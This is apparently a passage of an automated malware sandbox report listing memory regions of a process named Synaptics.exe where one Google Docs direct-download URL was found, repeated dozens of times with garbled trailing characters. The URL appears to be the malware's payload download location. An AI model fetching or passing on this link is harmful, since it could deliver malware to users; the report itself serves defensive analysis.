                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBdjsp
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCalif
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadConn
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCv
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD;
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDDMWR7T
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDJ
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDO
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet%E
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetSH:pyO
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetW_3vy
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD~
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF#8uR
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGDpr
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGHrs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGq
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHE
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHN
                                Source: Synaptics.exe, 00000010.00000002.2286676344.0000000019F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2309981009.000000002083E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2337101130.00000000296BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2276332212.0000000014DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2327929495.0000000025BFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2334120070.00000000283FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2341029245.000000002AD3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHV
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH_
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHttp/
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadInjec
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadInjecIdgs
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ4
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK?
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKAzs-
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKp
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKu
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL:
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLD
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLF
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLI
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLK=ql8
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLName
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLexrn
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMY
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNd
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOKzr
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO_
                                Source: Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOp
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOt
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2253029692.000000000E8FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPB
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPG
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPH
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPoJe
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ4
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQKSD
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQy
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR.xls$
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR.xlsvE
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRDera
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRHgs
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS;
                                Source: Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSecurk
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSr
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSw
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT5
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT?
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTA
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTF2wN
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTK2z
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTdpsW
